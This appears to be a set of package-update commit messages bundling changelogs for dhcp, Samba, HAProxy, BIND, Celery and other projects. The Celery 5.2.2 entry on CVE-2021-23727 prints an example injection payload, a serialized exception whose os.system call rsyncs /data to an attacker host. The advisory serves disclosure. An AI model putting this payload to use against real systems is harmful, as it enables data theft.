[GitLab #117]
- The logic in dhclient that causes it to decline DHCPv4 leases if the
client script exits abnormally (i.e. crashes) has been corrected.
[GitLab #123]
- The limit on the size of a lease file that can be loaded at startup
is now only enforced on 32-bit systems.
[GitLab #92]
- The PRNG initialization has been improved. It now uses the configure flag
`--with-randomdev=PATH`, which specifies the device from which to read the
initial seed. That is typically `/dev/random` (the default value) or
`/dev/urandom`, but may be specified otherwise on the local system. The old
behavior can be forced by disabling this feature (`--with-randomdev=no`).
If the initialization is disabled or reading from the random device fails,
the previous algorithm (retrieve the last four bytes of hardware addresses
from all network interfaces that have them, and use the current time and
process ID) is used.
[GitLab #197]
- A minor dhclient code fix was made to remove compilation warnings.
[GitLab #190]
- The hard-coded MD5 algorithm name was removed in OMAPI connection logic.
Previously, using any other algorithm via a key-algorithm statement would
allow OMAPI connections to be made, but subsequent actions such as updating
an object would fail.
[GitLab #148]
- The parallel build has been improved. Thanks to Sergei Trofimovich for
the patch. The parallel build is still experimental, as officially the
BIND 9 code does not support the parallel build for libraries.
[GitLab #91]
- Handling of LDAP options (`ldap-gssapi-principal` and `ldap-gssapi-keytab`)
has been improved. This is contributed code that has not been tested by ISC. Thank
you to Petr Mensik and Pavel Zhukov for the patches!
[GitLab !56,!75]
- It is now possible to use `option -g ipaddr` in the dhcrelay to replace the giaddr sent to
clients with the given ipaddr, to work around bogus clients like Solaris 11
grub which use giaddr instead of the announced router (3) to set up their
default route. Thanks to Jens Elkner for the patch!
[GitLab #223, !86, !92]
During the 2.51 branch, upstream decided that unison will have
backwards compatibility, so that there is no longer any reason to run
old versions. With 2.52, not only can it interop with 2.51 (and
2.48!), but it does not need to have matching ocaml version when
interoperating with other 2.52.x or newer. Thus, unison will now have
a single version in pkgsrc, and this is expected to continue.
## Changes in 2.52.0
Released 2022-03-12
* Feature negotiation, compatible wtih 2.51.
* New archive format (independent of ocaml version, based on umarshal)
Upgrade is automatic.
* New wire protocol (independent of ocaml version, based on umarshal)
New protocol is used if both sides are >= 2.52.0.
* Compatibility with 2.48
* Support for unix-domain sockets
* Many bugfixes and minor improvements
* ocaml compatibility is now >= 4.01
* NEWS is now in NEWS.md and not in the manual
Changelog:
1.4.25
appindicator or ayatana-appindicator is now optional, -DHAVE_LIBAPPINDICATOR=OFF will disable the Remmina system tray icon.
pyhoca-cli is needed for the X2Go plugin, -DWITH_X2GO=ON
NX, XDMCP and ST have been removed
Use -DWITH_FREERDP3=ON if you are using the FreeRDP master branch
libsodium is needed to build Remmina.
webkit2gtk3 is needed to build the WWW plugin.
-DWITH_KF5WALLET=ON is a new config option needed for the KWallet plugin (and the required kf5wallet libraries to build it).
News can be turned off with -DWITH_NEWS=OFF\
gtk-vnc is needed for the VNC plugin for GNOME and KVM, -DWITH_GVNC=ON
List of changes:
kiosk: Drop GNOME MediaKeys plugin !2377 @jbicha
Honour soft links target in SFTP !2379 @antenore
Optional close confirmation !2380 @antenore
Fix some build warnings !2382 @donoban
Fix manpages !2378 @Fantu
Snap cleanup + kwallet support !2381 @antenore
Deprecations and amend g_date_time_format_iso8601 !2383 @antenore
Fixes to snap build !2384 @giox069
Removing dependencies that are available as extensions !2385 @antenore
FreeRDP_OffscreenSupportLevel is of type UINT32 !2386 @akallabeth
Minor fixes!2387 @antenore
Get the right value for FreeRDP_AutoReconnectMaxRetries !2388 @antenore
1.4.24
appindicator or ayatana-appindicator is now optional, -DHAVE_LIBAPPINDICATOR=OFF will disable the Remmina system tray icon.
pyhoca-cli is needed for the X2Go plugin, -DWITH_X2GO=ON
NX, XDMCP and ST have been removed
Use -DWITH_FREERDP3=ON if you are using the FreeRDP master branch
libsodium is needed to build Remmina.
webkit2gtk3 is needed to build the WWW plugin.
-DWITH_KF5WALLET=ON is a new config option needed for the KWallet plugin (and the required kf5wallet libraries to build it).
News can be turned off with -DWITH_NEWS=OFF\
gtk-vnc is needed for the VNC plugin for GNOME and KVM, -DWITH_GVNC=ON
List of changes:
Contribution section added to issue template !2365 @kingu
Language of VNC encoding cleaned up !2367 @kingu
Remmina Hardening and Compliance !2366 @antenore
Remmina_preferences language reworked !2368 @kingu
Thanks 2021 !2371 @kingu
Resolve "Follow-up from "Remmina_preferences language reworked"" !2369 @antenore
Encryption level language reworked !2372 @kingu
Issue 2122 : Confirm on close of window !2374 @emmguyot
Adding flush and cairo clean up !2375 @antenore
3.58.0 (2022-02-11)
- More detailed error messages if an XML file known to exist cannot be opened
3.58.0-rc1 (2022-02-03)
+ Negotiate custom ALPN with FileZilla Server >=1.3.0 during TLS handshake to save some roundtrips during connection establishment
+ Prepare FileZilla to support TOTP-based 2FA authentication on future FileZilla Server versions
- Made downloading updates more robust if the network connection is unreliable
- Updated to libfilezilla 0.36.0
* Noteworthy changes in release 1.21.3 (2022-02-26)
** Fix computation of total bytes downloaded during FTP trasnfers (#61277)
** Add option to select TLS 1.3 on the command line
** Fix HSTS build issues on some 64-bit big-endian systems
** Hide password during status report in --no-verbose
** Remove a sprurious print statement that showed up even during --quiet
** Some more cleanups and bug-fixes
This includes a patch (already posted upstream) to fix updated Samba on
NetBSD's /proc, so the upgrade is not blocked anymore.
Release notes for 4.15:
EW FEATURES/CHANGES
====================
VFS
---
The effort to modernize Samba's VFS interface is complete and Samba 4.15.0 ships
with a modernized VFS designed for the post SMB1 world.
For details please refer to the documentation at source3/modules/The_New_VFS.txt
or visit the <https://wiki.samba.org/index.php/The_New_VFS>.
Bind DLZ: add the ability to set allow/deny lists for zone transfer clients
---------------------------------------------------------------------------
Up to now, any client could use a DNS zone transfer request to the
bind server, and get an answer from Samba. Now the default behaviour
will be to deny those request. Two new options have been added to
manage the list of authorized/denied clients for zone transfer
requests. In order to be accepted, the request must be issued by a
client that is in the allow list and NOT in the deny list.
"server multi channel support" no longer experimental
-----------------------------------------------------
This option is enabled by default starting with 4.15 (on Linux and FreeBSD).
Due to dependencies on kernel APIs of Linux or FreeBSD, it's only possible
to use this feature on Linux and FreeBSD for now.
samba-tool available without the ad-dc
--------------------------------------
The 'samba-tool' command is now available when samba is configured
"--without-ad-dc". Not all features will work, and some ad-dc specific options
have been disabled. The 'samba-tool domain' options, for example, are limited
when no ad-dc is present. Samba must still be built with ads in order to enable
'samba-tool'.
Improved command line user experience
-------------------------------------
Samba utilities did not consistently implement their command line interface. A
number of options were requiring to specify values in one tool and not in the
other, some options meant different in different tools.
These should be stories of the past now. A new command line parser has been
implemented with sanity checking. Also the command line interface has been
simplified and provides better control for encryption, signing and kerberos.
Previously many tools silently ignored unknown options. To prevent unexpected
behaviour all tools will now consistently reject unknown options.
Also several command line options have a smb.conf variable to control the
default now.
All tools are now logging to stderr by default. You can use "--debug-stdout" to
change the behavior. All servers will log to stderr at early startup until logging
is setup to go to a file by default.
### Common parser:
Options added:
--client-protection=off|sign|encrypt
Options renamed:
--kerberos -> --use-kerberos=required|desired|off
--krb5-ccache -> --use-krb5-ccache=CCACHE
--scope -> --netbios-scope=SCOPE
--use-ccache -> --use-winbind-ccache
Options removed:
-e|--encrypt
-C removed from --use-winbind-ccache
-i removed from --netbios-scope
-S|--signing
### Duplicates in command line utils
ldbadd/ldbdel/ldbedit/ldbmodify/ldbrename/ldbsearch:
-e is still available as an alias for --editor,
as it used to be.
-s is no longer reported as an alias for --configfile,
it never worked that way as it was shadowed by '-s' for '--scope'.
ndrdump:
-l is not available for --load-dso anymore
net:
-l is not available for --long anymore
sharesec:
-V is not available for --viewsddl anymore
smbcquotas:
--user -> --quota-user
nmbd:
--log-stdout -> --debug-stdout
smbd:
--log-stdout -> --debug-stdout
winbindd:
--log-stdout -> --debug-stdout
Scanning of trusted domains and enterprise principals
-----------------------------------------------------
As an artifact from the NT4 times, we still scanned the list of trusted domains
on winbindd startup. This is wrong as we never can get a full picture in Active
Directory. It is time to change the default value to "No". Also with this change
we always use enterprise principals for Kerberos so that the DC will be able
to redirect ticket requests to the right DC. This is e.g. needed for one way
trusts. The options `winbind use krb5 enterprise principals` and
`winbind scan trusted domains` will be deprecated in one of the next releases.
Support for Offline Domain Join (ODJ)
-------------------------------------
The net utility is now able to support the offline domain join feature
as known from the Windows djoin.exe command for many years. Samba's
implementation is accessible via the 'net offlinejoin' subcommand. It
can provision computers and request offline joining for both Windows
and Unix machines. It is also possible to provision computers from
Windows (using djoin.exe) and use the generated data in Samba's 'net'
utility. The existing options for the provisioning and joining steps
are documented in the net(8) manpage.
'samba-tool dns zoneoptions' for aging control
----------------------------------------------
The 'samba-tool dns zoneoptions' command can be used to turn aging on
and off, alter the refresh and no-refresh periods, and manipulate the
timestamps of existing records.
To turn aging on for a zone, you can use something like this:
samba-tool dns zoneoptions --aging=1 --refreshinterval=306600
which turns on aging and ensures no records less than five years old
are aged out and scavenged. After aging has been on for sufficient
time for records to be renewed, the command
samba-tool dns zoneoptions --refreshinterval=168
will set the refresh period to the standard seven days. Using this two
step process will help prevent the temporary loss of dynamic records
if scavenging happens before their first renewal.
Marking old records as static or dynamic with 'samba-tool'
----------------------------------------------------------
A bug in Samba versions prior to 4.9 meant records that were meant to
be static were marked as dynamic and vice versa. To fix the timestamps
in these domains, it is possible to use the following options,
preferably before turning aging on.
--mark-old-records-static
--mark-records-dynamic-regex
--mark-records-static-regex
The "--mark-old-records-static" option will make records older than the
specified date static (that is, with a zero timestamp). For example,
if you upgraded to Samba 4.9 in November 2018, you could use ensure no
old records will be mistakenly interpreted as dynamic using the
following option:
samba-tool dns zoneoptions --mark-old-records-static=2018-11-30
Then, if you know that that will have marked some records as static
that should be dynamic, and you know which those are due to your
naming scheme, you can use commands like:
samba-tool dns zoneoptions --mark-records-dynamic-regex='\w+-desktop'
where '\w+-desktop' is a perl-compatible regular expression that will
match 'bob-desktop', 'alice-desktop', and so on.
These options are deliberately long and cumbersome to type, so people
have a chance to think before they get to the end. You can make a
mess if you get it wrong.
All 'samba-tool dns zoneoptions' modes can be given a "--dry-run/-n"
argument that allows you to inspect the likely results before going
ahead.
NOTE: for aging to work, you need to have "dns zone scavenging = yes"
set in the smb.conf of at least one server.
DNS tombstones are now deleted as appropriate
---------------------------------------------
When all the records for a DNS name have been deleted, the node is put
in a tombstoned state (separate from general AD object tombstoning,
which deleted nodes also go through). These tombstones should be
cleaned up periodically. Due to a conflation of scavenging and
tombstoning, we have only been deleting tombstones when aging is
enabled.
If you have a lot of tombstoned DNS nodes (that is, DNS names for
which you have removed all the records), cleaning up these DNS
tombstones may take a noticeable time.
DNS tombstones use a consistent timestamp format
------------------------------------------------
DNS records use an hours-since-1601 timestamp format except for in the
case of tombstone records where a 100-nanosecond-intervals-since-1601
format is used (this latter format being the most common in Windows).
We had mixed that up, which might have had strange effects in zones
where aging was enabled (and hence tombstone timestamps were used).
samba-tool dns update and RPC changes
-------------------------------------
The dnsserver DCERPC pipe can be used by 'samba-tool' and Windows tools
to manipulate dns records on the remote server. A bug in Samba meant
it was not possible to update an existing DNS record to change the
TTL. The general behaviour of RPC updates is now closer to that of
Windows.
'samba-tool dns update' is now a bit more careful in rejecting and
warning you about malformed IPv4 and IPv6 addresses.
CVE-2021-3671: Crash in Heimdal KDC and updated security release policy
-----------------------------------------------------------------------
An unuthenticated user can crash the AD DC KDC by omitting the server
name in a TGS-REQ. Per Samba's updated security process a specific
security release was not made for this issue as it is a recoverable
Denial Of Service.
See https://wiki.samba.org/index.php/Samba_Security_Proces
samba-tool domain backup offline with the LMDB backend
------------------------------------------------------
samba-tool domain backup offline, when operating with the LMDB backend
now correctly takes out locks against concurrent modification of the
database during the backup. If you use this tool on a Samba AD DC
using LMDB, you should upgrade to this release for safer backups.
REMOVED FEATURES
================
Tru64 ACL support has been removed from this release. The last
supported release of Tru64 UNIX was in 2012.
NIS support has been removed from this release. This is not
available in Linux distributions anymore.
The DLZ DNS plugin is no longer built for Bind versions 9.8 and 9.9,
which have been out of support since 2018.
smb.conf changes
================
Parameter Name Description Default
-------------- ----------- -------
client use kerberos New desired
client max protocol Values Removed
client min protocol Values Removed
client protection New default
client smb3 signing algorithms New see man smb.conf
client smb3 encryption algorithms New see man smb.conf
preopen:posix-basic-regex New No
preopen:nomatch_log_level New 5
preopen:match_log_level New 5
preopen:nodigits_log_level New 1
preopen:founddigits_log_level New 3
preopen:reset_log_level New 5
preopen:push_log_level New 3
preopen:queue_log_level New 10
server max protocol Values Removed
server min protocol Values Removed
server multi channel support Changed Yes (on Linux and FreeBSD)
server smb3 signing algorithms New see man smb.conf
server smb3 encryption algorithms New see man smb.conf
winbind use krb5 enterprise principals Changed Yes
winbind scan trusted domains Changed No
Release notes for 4.14:
NEW FEATURES/CHANGES
====================
Here is a copy of a clarification note added to the Samba code
in the file: VFS-License-clarification.txt.
--------------------------------------------------------------
A clarification of our GNU GPL License enforcement boundary within the Samba
Virtual File System (VFS) layer.
Samba is licensed under the GNU GPL. All code committed to the Samba
project or that creates a "modified version" or software "based on" Samba must
be either licensed under the GNU GPL or a compatible license.
Samba has several plug-in interfaces where external code may be called
from Samba GNU GPL licensed code. The most important of these is the
Samba VFS layer.
Samba VFS modules are intimately connected by header files and API
definitions to the part of the Samba code that provides file services,
and as such, code that implements a plug-in Samba VFS module must be
licensed under the GNU GPL or a compatible license.
However, Samba VFS modules may themselves call third-party external
libraries that are not part of the Samba project and are externally
developed and maintained.
As long as these third-party external libraries do not use any of the
Samba internal structure, APIs or interface definitions created by the
Samba project (to the extent that they would be considered subject to the GNU
GPL), then the Samba Team will not consider such third-party external
libraries called from Samba VFS modules as "based on" and/or creating a
"modified version" of the Samba code for the purposes of GNU GPL.
Accordingly, we do not require such libraries be licensed under the GNU GPL
or a GNU GPL compatible license.
VFS
---
The effort to modernize Samba's VFS interface has reached a major milestone with
the next release Samba 4.14.
For details please refer to the documentation at source3/modules/The_New_VFS.txt or
visit the <https://wiki.samba.org/index.php/The_New_VFS>.
Printing
--------
Publishing printers in AD is more reliable and more printer features are
added to the published information in AD. Samba now also supports Windows
drivers for the ARM64 architecture.
Client Group Policy
-------------------
This release extends Samba to support Group Policy functionality for Winbind
clients. Active Directory Administrators can set policies that apply Sudoers
configuration, and cron jobs to run hourly, daily, weekly or monthly.
To enable the application of Group Policies on a client, set the global
smb.conf option 'apply group policies' to 'yes'. Policies are applied on an
interval of every 90 minutes, plus a random offset between 0 and 30 minutes.
Policies applied by Samba are 'non-tattooing', meaning that changes can be
reverted by executing the `samba-gpupdate --unapply` command. Policies can be
re-applied using the `samba-gpupdate --force` command.
To view what policies have been or will be applied to a system, use the
`samba-gpupdate --rsop` command.
Administration of Samba policy requires that a Samba ADMX template be uploaded
to the SYSVOL share. The samba-tool command `samba-tool gpo admxload` is
provided as a convenient method for adding this policy. Once uploaded, policies
can be modified in the Group Policy Management Editor under Computer
Configuration/Policies/Administrative Templates. Alternatively, Samba policy
may be managed using the `samba-tool gpo manage` command. This tool does not
require the admx templates to be installed.
Python 3.6 or later required
----------------------------
Samba's minimum runtime requirement for python was raised to Python
3.6 with samba 4.13. Samba 4.14 raises this minimum version to Python
3.6 also to build Samba. It is no longer possible to build Samba
(even just the file server) with Python versions 2.6 and 2.7.
As Python 2.7 has been End Of Life upstream since April 2020, Samba
is dropping ALL Python 2.x support in this release.
Miscellaneous samba-tool changes
--------------------------------
The 'samba-tool' subcommands to manage AD objects (e.g. users, computers and
groups) now consistently use the "add" command when adding a new object to
the AD. The previous deprecation warnings when using the 'add' commands
have been removed. For compatibility reasons, both the 'add' and 'create'
commands can be used now.
Users, groups and contacts can now be renamed with the respective rename
commands.
Locked users can be unlocked with the new 'samba-tool user unlock' command.
The 'samba-tool user list' and 'samba-tool group listmembers' commands
provide additional options to hide expired and disabled user accounts
(--hide-expired and --hide-disabled).
CTDB CHANGES
============
* The NAT gateway and LVS features now uses the term "leader" to refer
to the main node in a group through which traffic is routed and
"follower" for other members of a group. The command for
determining the leader has changed to "ctdb natgw leader" (from
"ctdb natgw master"). The configuration keyword for indicating that
a node can not be the leader of a group has changed to
"follower-only" (from "slave-only"). Identical changes were made
for LVS.
* Remove "ctdb isnotrecmaster" command. It isn't used by CTDB's
scripts and can be checked by users with "ctdb pnn" and "ctdb
recmaster".
smb.conf changes
================
Parameter Name Description Default
-------------- ----------- -------
smb encrypt Removed
async dns timeout New 10
client smb encrypt New default
honor change notify privilege New No
smbd force process locks New No
server smb encrypt New default
3.9.4 - 14/02/2022
Added
Add webgo provider
Modified
Extend possible record types list for dreamhost provider
3.9.3 - 27/01/2022
Modified
Fix compatibility with requests>=2 in transip provider
2.5.4
- BUG/MEDIUM: htx: Be sure to have a buffer to perform a raw copy of a message
- BUG/MEDIUM: mux-h1: Don't wake h1s if mux is blocked on lack of output buffer
- BUG/MAJOR: mux-h2: Be sure to always report HTX parsing error to the app layer
- DOC: Fix usage/examples of deprecated ACLs
- BUG/MINOR: proxy: preset the error message pointer to NULL in parse_new_proxy()
- REGTESTS: fix the race conditions in 40be_2srv_odd_health_checks
- CI: github: enable pool debugging by default
- BUG/MEDIUM: stream: Abort processing if response buffer allocation fails
5.9.9
Improvements
Add loadbalancer timeout values
Add pricing date to slcli order preset-list
New Commands
slcli vlan create-options add new feature on vlan
slcli account bandwidth-pools Bandwidth pool features
It builds for me repeatedly with MAKE_JOBS=20.
(If there are failures and this needs reenabling, please open a
high-quality bug report upstream and provide a link.)
The next version will be 2.52.0, and this will interoperate with 2.51.
That is expected to continue indefinitely. There is no reason to have
multiple versions again, so say that the next update will move to the
unversioned name.
ocaml.mk defines MKPIE_SUPPORTED=no, but this was after bsd.prefs.mk
so _PKGSRC_MKPIE was already set to yes. This was made harder to
debug by options.mk including bsd.prefs.mk. Reorder to load ocaml.mk
earlier.
v11.27.0
Automated Spec Update
[Setup] Update deprecated description-file to use description_file
v11.26.0
Add scopes to documentation
Ensure Dropbox error is thrown in refresh access token
v3.3.1
Small fix to --attribute-comment in backend python client.
v3.3.0
Python
Add attrs export to python client
ApiRoute
ApiRoute: Provide a hash implementation, too.
Add sorting of ApiRoute, guaranteeing stable file output.
Objective C
Fix obj_c types to not overwrite jsonDict with nil
Synchronize access to route singletons
Added Bytes as a primitive that doesn't require serialization
Fix objc generation for Bytes property and for hash methods with switch statements
JavaScript/TypeScript
Fix wrap_error_in generation for TS client
Fix imports for TS autogenerated imports
Add ability to wrap errors in a custom error class for JS/TS
Add ability to dynamically import namespaces from types in the tsd client
Make extra parameters optional for JS/TS backends
2.5.3
- MINOR: sock: move the unused socket cleaning code into its own function
- BUG/MEDIUM: mworker: close unused transferred FDs on load failure
- BUG/MINOR: mworker: fix a FD leak of a sockpair upon a failed reload
- BUG/MINOR: sink: Use the right field in appctx context in release callback
- BUG/MEDIUM: resolvers: Really ignore trailing dot in domain names
- BUG/MEDIUM: fd: always align fdtab[] to 64 bytes
- BUG/MAJOR: compiler: relax alignment constraints on certain structures
- MINOR: httpclient: Don't limit data transfer to 1024 bytes
- BUG/MINOR: httpclient: reinit flags in httpclient_start()
- BUG/MINOR: mailers: negotiate SMTP, not ESMTP
- BUG/MINOR: ssl: Add missing return value check in ssl_ocsp_response_print
- BUG/MINOR: ssl: Fix leak in "show ssl ocsp-response" CLI command
- BUG/MINOR: ssl: Missing return value check in ssl_ocsp_response_print
- CLEANUP: httpclient/cli: fix indentation alignment of the help message
- BUG/MINOR: tools: url2sa reads ipv4 too far
- BUG/MEDIUM: httpclient: limit transfers to the maximum available room
- DEBUG: buffer: check in __b_put_blk() whether the buffer room is respected
2.5.2
- BUG/MEDIUM: connection: properly leave stopping list on error
- BUG/MEDIUM: htx: Adjust length to add DATA block in an empty HTX buffer
- BUG/MINOR: httpclient: don't send an empty body
- BUG/MINOR: httpclient: set default Accept and User-Agent headers
- BUG/MINOR: httpclient/lua: don't pop the lua stack when getting headers
- BUILD/MINOR: fix solaris build with clang.
- BUG/MEDIUM: server: avoid changing healthcheck ctx with set server ssl
- DOC: management: mark "set server ssl" as deprecated
- MEDIUM: cli: yield between each pipelined command
- MINOR: channel: add new function co_getdelim() to support multiple delimiters
- BUG/MINOR: cli: avoid O(bufsize) parsing cost on pipelined commands
- MEDIUM: h2/hpack: emit a Dynamic Table Size Update after settings change
- BUG/MEDIUM: cli: Never wait for more data on client shutdown
- BUG/MEDIUM: mcli: do not try to parse empty buffers
- BUG/MEDIUM: mcli: always realign wrapping buffers before parsing them
- BUG/MINOR: stream: make the call_rate only count the no-progress calls
- DEBUG: cli: add a new "debug dev fd" expert command
- BUILD: debug/cli: condition test of O_ASYNC to its existence
- DEBUG: pools: add new build option DEBUG_POOL_INTEGRITY
- REGTESTS: ssl: Fix ssl_errors regtest with OpenSSL 1.0.2
- BUG/MEDIUM: mworker: don't lose the stats socket on failed reload
- BUG/MINOR: mworker: does not add the -sf in wait mode
- BUG/MINOR: pools: always flush pools about to be destroyed
- DEBUG: pools: add extra sanity checks when picking objects from a local cache
- DEBUG: pools: let's add reverse mapping from cache heads to thread and pool
- DEBUG: pools: replace the link pointer with the caller's address on pool_free()
- BUG/MAJOR: sched: prevent rare concurrent wakeup of multi-threaded tasks
- BUG/MINOR: mworker: does not erase the pidfile upon reload
- DEBUG: fd: make sure we never try to insert/delete an impossible FD number
- MINOR: listener: replace the listener's spinlock with an rwlock
- BUG/MEDIUM: listener: read-lock the listener during accept()
- BUG/MINOR: httpclient: Revisit HC request and response buffers allocation
- BUG/MEDIUM: httpclient: Xfer the request when the stream is created
- BUG/MINOR: ssl: Remove empty lines from "show ssl ocsp-response <id>" output
- BUG/MINOR: jwt: Double free in deinit function
- BUG/MINOR: jwt: Missing pkey free during cleanup
- BUG/MINOR: jwt: Memory leak if same key is used in multiple jwt_verify calls
- BUG/MINOR: httpclient/cli: display junk characters in vsn
- BUG/MAJOR: http/htx: prevent unbounded loop in http_manage_server_side_cookies
- BUG/MAJOR: spoe: properly detach all agents when releasing the applet
- REGTESTS: server: close an occasional race on dynamic_server_ssl.vtc
- REGTESTS: peers: leave a bit more time to peers to synchronize
- BUG/MEDIUM: h2/hpack: fix emission of HPACK DTSU after settings change
- BUG/MINOR: mux-h2: update the session's idle delay before creating the stream
--- 9.16.26 released ---
5801. [bug] Log "quota reached" message when hard quota
is reached when accepting a connection. [GL #3125]
5800. [func] Add ECS support to the DLZ interface. [GL #3082]
5797. [bug] A failed view configuration during a named
reconfiguration procedure could cause inconsistencies
in BIND internal structures, causing a crash or other
unexpected errors. [GL #3060]
5795. [bug] rndc could crash when interrupted by a signal
before receiving a response. [GL #3080]
5793. [bug] Correctly detect and enable UDP recvmmsg support
in all versions of libuv that support it. [GL #3095]
This is an alpha for 2.52.0 and contains significant changes.
While just upgrading and using it should work, it has not received
enough testing to be called beta. In particular the new formats have
not been tested with big endian processors.
## Changes in 2.52.0
* Feature negotiation, compatible with 2.51.
* New archive format (independent of ocaml version, based on umarshal)
Upgrade is automatic.
* New wire protocol (independent of ocaml version, based on umarshal)
New protocol is used if both sides are >= 2.52.0.
* Support for unix-domain sockets
* Many bugfixes and minor improvements
* ocaml compatibility is now >= 4.01
* NEWS is now in NEWS.md and not in the manual
Release v1.44.0
Core
xDS: Rbac filter updates
Fix xDS client for multiple watchers.
bump C-core version for upcoming release.
Add a trace to list which filters are contained in a channel stack.
Remove grpc_httpcli_context.
xDS: Add support for RBAC HTTP filter.
API to cancel grpc_resolve_address.
Replace work serializer with a mutex in c-ares resolver.
xDS: Add graceful shutdown for old connections on listener resource update.
C++
Promote ClientContext::set_wait_for_ready to be non-experimental.
Python
Add python async example for hellostreamingworld using generator.
Disable __wrap_memcpy hack for Python builds.
Bump Bazel Python Cython dependency to 0.29.26.
Fix libatomic linking on Raspberry Pi OS Bullseye.
Allow generated proto sources in remote repositories for py_proto_library.
A patch fixing SunOS builds was lost during a recent update, restore
it. (And s/SmartOS/SunOS/ in comment, this doesn't just affect SmartOS,
reproduced and fixed on OmniOS. This package also fails to build on
Linux, but that's another issue entirely.) Addresses PR pkg/56716 from
Russell Hansen.
Changes not found. But note:
Important
Please note that from version 1.0.1 Flower uses Celery 5 and has
to be invoked in the same style as celery commands do.
The key takeaway here is that the Celery app's arguments have to
be specified after the celery command and Flower's arguments have
to be specified after the flower sub-command.
This is the template to follow:
celery [celery args] flower [flower args]
5.2.3
=====
- Allow redis >= 4.0.2.
- Upgrade minimum required pymongo version to 3.11.1.
- tested pypy3.8 beta (#6998).
- Split Signature.__or__ into subclasses' __or__ (#7135).
- Prevent duplication in event loop on Consumer restart.
- Restrict setuptools>=59.1.1,<59.7.0.
- Kombu bumped to v5.2.3
- py-amqp bumped to v5.0.9
- Some docs & CI improvements.
5.2.2
=====
- Various documentation fixes.
- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
``os.system("rsync /data attacker@192.168.56.100:~/data")``
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments like so:
.. code-block:: python
{
"exc_module": "os",
'exc_type': "system",
"exc_message": "rsync /data attacker@192.168.56.100:~/data"
}
According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.
5.2.1
=====
- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
- Remove dependency to case (#7077).
- fix: task expiration is timezone aware if needed (#7065).
- Initial testing of pypy-3.8 beta to CI.
- Docs, CI & tests cleanups.
5.2.0
=====
- Prevent from subscribing to empty channels (#7040)
- fix register_task method.
- Fire task failure signal on final reject (#6980)
- Limit pymongo version: <3.12.1 (#7041)
- Bump min kombu version to 5.2.1
5.2.0rc2
========
- Bump Python 3.10.0 to rc2.
- [pre-commit.ci] pre-commit autoupdate (#6972).
- autopep8.
- Prevent worker to send expired revoked items upon hello command (#6975).
- docs: clarify the 'keeping results' section (#6979).
- Update deprecated task module removal in 5.0 documentation (#6981).
- [pre-commit.ci] pre-commit autoupdate.
- try python 3.10 GA.
- mention python 3.10 on readme.
- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
- Azure blockblob backend parametrized connection/read timeouts (#6978).
- Add as_uri method to azure block blob backend.
- Add possibility to override backend implementation with celeryconfig (#6879).
- [pre-commit.ci] pre-commit autoupdate.
- try to fix deprecation warning.
- [pre-commit.ci] pre-commit autoupdate.
- not needed anyore.
- not needed anyore.
- not used anymore.
- add github discussions forum
5.2.0rc1
========
- Kill all workers when main process exits in prefork model (#6942).
- test kombu 5.2.0rc1 (#6947).
- try moto 2.2.x (#6948).
- Prepared Hacker News Post on Release Action.
- update setup with python 3.7 as minimum.
- update kombu on setupcfg.
- Added note about automatic killing all child processes of worker after its termination.
- [pre-commit.ci] pre-commit autoupdate.
- Move importskip before greenlet import (#6956).
- amqp: send expiration field to broker if requested by user (#6957).
- Single line drift warning.
- canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
- Allow to enable Events with app.conf mechanism.
- Warn when expiration date is in the past.
- Add the Framework :: Celery trove classifier.
- Give indication whether the task is replacing another (#6916).
- Make setup.py executable.
- Bump version: 5.2.0b3 → 5.2.0rc1.
5.2.0b3
=======
- Add args to LOG_RECEIVED (fixes#6885) (#6898).
- Terminate job implementation for eventlet concurrency backend (#6917).
- Add cleanup implementation to filesystem backend (#6919).
- [pre-commit.ci] pre-commit autoupdate (#69).
- Add before_start hook (fixes#4110) (#6923).
- Restart consumer if connection drops (#6930).
- Remove outdated optimization documentation (#6933).
- added https verification check functionality in arangodb backend (#6800).
- Drop Python 3.6 support.
- update supported python versions on readme.
- [pre-commit.ci] pre-commit autoupdate (#6935).
- Remove appveyor configuration since we migrated to GA.
- pyugrade is now set to upgrade code to 3.7.
- Drop exclude statement since we no longer test with pypy-3.6.
- 3.10 is not GA so it's not supported yet.
- Celery 5.1 or earlier support Python 3.6.
- Fix linting error.
- fix: Pass a Context when chaining fail results (#6899).
- Bump version: 5.2.0b2 → 5.2.0b3.
5.2.0b2
=======
- Test windows on py3.10rc1 and pypy3.7 (#6868).
- Route chord_unlock task to the same queue as chord body (#6896).
- Add message properties to app.tasks.Context (#6818).
- handle already converted LogLevel and JSON (#6915).
- 5.2 is codenamed dawn-chorus.
- Bump version: 5.2.0b1 → 5.2.0b2.
5.2.0b1
=======
- Add Python 3.10 support (#6807).
- Fix docstring for Signal.send to match code (#6835).
- No blank line in log output (#6838).
- Chords get body_type independently to handle cases where body.type does not exist (#6847).
- Fix#6844 by allowing safe queries via app.inspect().active() (#6849).
- Fix multithreaded backend usage (#6851).
- Fix Open Collective donate button (#6848).
- Fix setting worker concurrency option after signal (#6853).
- Make ResultSet.on_ready promise hold a weakref to self (#6784).
- Update configuration.rst.
- Discard jobs on flush if synack isn't enabled (#6863).
- Bump click version to 8.0 (#6861).
- Amend IRC network link to Libera (#6837).
- Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
- Fix inspect --json output to return valid json without --quiet.
- Remove celery.task references in modules, docs (#6869).
- The Consul backend must correctly associate requests and responses (#6823).
5.2.3
What's Changed
create codeql actions by @auvipy in #1441
create security policy doc by @auvipy in #1440
drop as we dont use travis by @auvipy in #1442
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1443
Fix PyPy CI jobs by @illia-v in #1446
